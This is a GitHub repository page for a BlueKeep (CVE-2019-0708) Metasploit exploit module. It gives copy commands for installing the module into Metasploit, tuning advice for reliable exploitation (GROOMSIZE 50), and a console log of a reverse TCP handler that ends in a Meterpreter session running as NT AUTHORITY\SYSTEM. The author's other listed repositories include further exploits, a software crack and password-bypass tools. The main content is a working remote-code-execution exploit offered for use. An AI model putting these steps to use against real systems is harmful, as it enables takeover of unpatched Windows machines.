• Stars
    star
    103
  • Rank 333,046 (Top 7 %)
  • Language
    Ruby
  • Created about 5 years ago
  • Updated about 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Bluekeep(CVE 2019-0708) exploit released

bluekeep-exploit

Bluekeep(CVE 2019-0708) exploit released

https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/

How To use:

Simply make folder named rdp (for convenience) in /usr/share/metasploit-framework/modules/exploits/windows/ paste this exploit file(cve_2019_0708_bluekeep_rce.rb) in the folder(rdp) and use ur metasploit skills

Also replace the files in following folders:-

rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/

  cp ./rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb      

rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

  cp ./rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb      

cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

  cp ./cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/

  cp ./cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

like: use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

and then ur general concepts of setting rhosts,lhost,payload etc

Thanks to the Genius Group of People for their wonderful work

Note:[I am not the developer of this exploit but only an ethusiast of learning exploits]

HOW TO MAKE THE EXPLOIT WORK 100% OF THE TIME:

############################

You have to set the GROOMSIZE as show below with different combinations and error Also my VMWARE(15) windows hardware was 2GB RAM and 1 Core processor

Conclusion setting GROOMSIZE to 50 worked as good as gold

############################

  msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 100
 GROOMSIZE => 100
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 [*] Started reverse TCP handler on 192.168.43.84:4444 
 [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa801f000000, Channel count 1.
 [*] 192.168.43.137:3389 - Surfing channels ...
 [*] 192.168.43.137:3389 - Lobbing eggs ...
 [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
 [*] Exploit completed, but no session was created.
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 150
 GROOMSIZE => 150
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 [*] Started reverse TCP handler on 192.168.43.84:4444 
 [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 150MB, target address 0xfffffa8022200000, Channel count 1.
 [*] 192.168.43.137:3389 - Surfing channels ...
 [*] 192.168.43.137:3389 - Lobbing eggs ...
 [-] 192.168.43.137:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
 [*] Exploit completed, but no session was created.
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set GROOMSIZE 50
 GROOMSIZE => 50
 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

 [*] Started reverse TCP handler on 192.168.43.84:4444 
 [*] 192.168.43.137:3389   - Detected RDP on 192.168.43.137:3389   (Windows version: 6.1.7601) (Requires NLA: No)
 [+] 192.168.43.137:3389   - The target is vulnerable.
 [*] 192.168.43.137:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa801be00000, Channel count 1.
 [*] 192.168.43.137:3389 - Surfing channels ...
 [*] 192.168.43.137:3389 - Lobbing eggs ...
 [*] 192.168.43.137:3389 - Forcing the USE of FREE'd object ...
 [*] Sending stage (206403 bytes) to 192.168.43.137
 [*] Meterpreter session 2 opened (192.168.43.84:4444 -> 192.168.43.137:51854) at 2019-09-10 22:59:44 +0530

 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > 

More Repositories

1

whatsapp_rce

whatsapp remote code execution
Shell
115
star
2

WIN10-Activation

Batchfile
58
star
3

ios-RCE-Vulnerability

Latest ios RCE Vulnerability disclosed by Google Security Researcher
40
star
4

CVE2020-17087

Elevation Of Privileges Proof of Concept for Windows (win7-win10)
30
star
5

Ios-Jailbreak

jailbreak-ios-exploit
21
star
6

GPT4Docs

An Offline Document Enquiry LLM for Everyone
Python
10
star
7

Windows-EOP-Exploit

Latest working elevation of privilege exploit by Tavis Ormandy from Google's Project Zero Team
9
star
8

reset-excel-password

Reset Excel sheet and workbook protection
9
star
9

PinsTer

A Pinging Software to do very fast parallel pinging in bulk and visualize in Web-Browser. It can also be used in SCADA/HMI for updating tags or representation in web-browser directly using Web-Browser component
HTML
3
star
10

IbaConv

A wrapper for ibaAnalyzer to automatically do file conversion to different formats
Batchfile
3
star
11

port-forwarder

A handly portable GUI for windows port forwarding
2
star
12

PSCAD-Automation-using-Python

2
star
13

RigClConxM

A handy tool to extend ibaAnalyzer feature on right click in right click context menu
Batchfile
2
star
14

IbaAnalyzer-Automation-using-Python

2
star
15

CVE-2020-0796-LPE

SMBGHOST local privilege escalation
2
star
16

winbyepass

A very simple Non destructive solution to reset Windows Password
2
star
17

Corel-draw-crack

How to crack corel draw
2
star
18

CoVacK

A software to reveal the truth of Vaccine availability in your location by OTP
1
star
19

port-routing

A Python program to route the network traffic from one port to another
1
star
20

IRCTC-train-enquiry

Fastest Train enquiry using commandline
1
star
21

RSCAD-PSCAD-Integration-using-Python

1
star
22

MouPaThack

A mouse position tracking program
1
star
23

Windows-Product-Key-Script

View your windows product key
VBScript
1
star
24

cve2020-0796

Microsoft SMV3.1.1 wormable Exploit
1
star
25

VBA-Projects-for-excel

Using VBA to automate official Excel works
1
star
26

MPM2-Realtime-values-monitoring-using-Python

1
star
27

RSCAD-Automation-Using-Python

1
star
28

Plotting-RSCAD-PSCAD-Files-Python

1
star
29

SVC-Simulator-in-Python

1
star
30

llm-duckduckgo

A simple pythonic way for unlimited access to LLM provided by duck.ai
Python
1
star
31

duckdns

A Program which runs in your PC and gives you fixed domain from dynamic IP
Python
1
star